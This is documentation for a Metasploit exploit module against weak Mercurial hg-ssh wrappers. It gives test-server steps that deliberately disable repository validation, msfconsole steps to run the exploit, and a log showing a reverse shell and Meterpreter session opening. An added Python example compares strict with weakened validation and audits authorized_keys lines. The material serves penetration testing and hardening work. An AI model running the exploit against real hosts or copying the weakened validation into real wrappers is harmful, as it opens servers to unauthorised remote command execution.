GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/linux/ssh/mercurial_ssh_exec.md

Vulnerable Application

mercurial.

This module was successfully tested against:

  • Kali Linux, HG 4.0 and a customized hg-ssh (to simulate custom hg-ssh wrappers which have weak repo validation)

Vulnerable Server Setup Steps

  1. Install mercurial on your test server

  2. Patch the hg-ssh Python script to emulate custom/weak repo validation in the hg-ssh wrapper: vi $(which hg-ssh)

    • Replace if repo in allowed_paths: with if True:

    • Replace cmd = ['-R', repo, 'serve', '--stdio'] with cmd = ['-R', path, 'serve', '--stdio']

  3. Setup a user with SSH pubkey auth

  4. Create a test repo in the user's home directory and add a commit

    • mkdir -p repos/repo1

    • cd repos/repo1

    • echo "hello world" > README

    • hg add README

    • hg commit -m "Adds README"

  5. Restrict user in authorized_keys to hg-ssh binary only

    • command="hg-ssh ~/repos/repo1",no-port-forwarding,no-X11-forwarding,no-agent-forwarding INSERT_SSH_PUB_KEY

  6. Verify SSH user can authenticate (should prompt and prevent a shell)

  7. Verify SSH user commands are not allowed (should prevent arbitrary commands)
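The setup steps above deliberately weaken two things: the allowlist check on the repository path (step 2) and the forced-command restriction in authorized_keys (step 5). The following Python is an added example, not part of the module documentation or of Mercurial's hg-ssh, that models the stock hg-ssh validation beside the weakened variant the steps produce, and adds a small audit check for the authorized_keys line. The allowlist, home directory, key lines and the option-like token are constructed values; stock hg-ssh also applies os.path.expanduser to the path, which is left out here so the example runs deterministically.

```python
"""Strict vs. weakened hg-ssh command validation, plus an authorized_keys audit.

Added example (not from the Metasploit documentation or from hg-ssh itself).
"""
import posixpath
import shlex

# Constructed values for the example: the restricted user's home and the
# only repository the wrapper should ever serve (compare setup step 5).
CWD = "/home/hguser"
ALLOWED_REPOS = ["/home/hguser/repos/repo1"]


def strict_hg_command(orig_cmd, allowed=ALLOWED_REPOS, cwd=CWD):
    """Modelled on stock hg-ssh: accept only 'hg -R <repo> serve --stdio',
    normalise <repo> against the user's home, and require the result to be
    in the allowlist. Returns the argv to hand to hg, or None if rejected."""
    argv = shlex.split(orig_cmd)
    if argv[:2] != ["hg", "-R"] or argv[3:] != ["serve", "--stdio"]:
        return None                      # wrong shape: extra or missing args
    repo = posixpath.normpath(posixpath.join(cwd, argv[2]))
    if repo not in allowed:
        return None                      # traversal or unlisted repo
    return ["-R", repo, "serve", "--stdio"]


def weak_hg_command(orig_cmd):
    """The variant produced by setup step 2: the allowlist test is replaced by
    'if True' and the raw user-supplied token is forwarded as the -R value.
    Anything hg itself treats as an option now reaches hg's own argv."""
    argv = shlex.split(orig_cmd)
    if argv[:2] != ["hg", "-R"] or argv[3:] != ["serve", "--stdio"]:
        return None
    path = argv[2]
    if True:                             # allowlist check removed
        return ["-R", path, "serve", "--stdio"]


# Options every restricted key line from step 5 must carry.
REQUIRED_KEY_OPTIONS = {"no-port-forwarding", "no-X11-forwarding",
                        "no-agent-forwarding"}


def _split_options(opts):
    """Split the comma-separated options field; commas inside command="..."
    belong to the command, so track quotes instead of using str.split."""
    out, cur, quoted = [], [], False
    for ch in opts:
        if ch == '"':
            quoted = not quoted
        if ch == "," and not quoted:
            out.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    out.append("".join(cur))
    return out


def authorized_keys_line_is_restricted(line):
    """True if the line forces hg-ssh as the command and carries all three
    no-*-forwarding options; False for a bare key or a partial restriction."""
    quoted = False
    for i, ch in enumerate(line):
        if ch == '"':
            quoted = not quoted
        elif ch == " " and not quoted:
            break                        # end of the options field
    else:
        return False                     # no space at all: not a key line
    opts = _split_options(line[:i])
    forced = [o for o in opts if o.startswith('command="')]
    if len(forced) != 1 or not forced[0][len('command="'):].startswith("hg-ssh "):
        return False
    return REQUIRED_KEY_OPTIONS.issubset(opts)


# Constructed authorized_keys lines (placeholder key material).
GOOD_KEY_LINE = ('command="hg-ssh ~/repos/repo1",no-port-forwarding,'
                 'no-X11-forwarding,no-agent-forwarding '
                 'ssh-ed25519 AAAAC3PLACEHOLDERKEY user@example')
WEAK_KEY_LINE = ('command="hg-ssh ~/repos/repo1",no-port-forwarding '
                 'ssh-ed25519 AAAAC3PLACEHOLDERKEY user@example')

if __name__ == "__main__":
    samples = [
        "hg -R repos/repo1 serve --stdio",            # legitimate clone/push
        "hg -R repos/repo1/../secret serve --stdio",  # traversal to other repo
        "hg -R --bogus-option serve --stdio",         # option-like path token
        "hg -R repos/repo1 serve --stdio --bogus-option",
        "ls -la",
    ]
    for cmd in samples:
        print(f"{cmd!r:50} strict={strict_hg_command(cmd)} weak={weak_hg_command(cmd)}")
    print("good key line restricted:", authorized_keys_line_is_restricted(GOOD_KEY_LINE))
    print("weak key line restricted:", authorized_keys_line_is_restricted(WEAK_KEY_LINE))
```

The strict validator rejects the option-like token because normalisation turns it into a path under the home directory that is not in the allowlist; the weakened one forwards it untouched, which is the gap step 2 opens. The key-line check is the sort of thing to run over every authorized_keys file for repository service accounts, since a forced command without the no-*-forwarding options still leaves port and agent forwarding available.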

Verification Steps

  1. Start msfconsole

  2. Do: use exploit/linux/ssh/mercurial_ssh_exec

  3. Do: set RHOST <ip>

  4. Do: set LHOST <ip>

  5. Do: set SSH_PRIV_KEY_FILE /Users/jsmith/.ssh/id_rsa

  6. Do: exploit

  7. You should get a shell.

Scenarios

Kali Linux, HG 4.0 and a customized hg-ssh (to simulate custom hg-ssh wrappers which have weak repo validation)

```
msf exploit(mercurial_ssh_exec) > exploit
[*] Started reverse TCP handler on 192.168.10.37:4444
[*] 192.168.10.99:22 - 192.168.10.99:22 - Attempting to login...
[+] 192.168.10.99:22 - SSH connection is established.
[+] 192.168.10.99:22 - Triggered Debugger (entering debugger - type c to continue starting hg or h for help)
[*] Sending stage (39842 bytes) to 192.168.10.99
[*] Meterpreter session 1 opened (192.168.10.37:4444 -> 192.168.10.99:57606) at 2017-04-18 19:16:44 -0400
```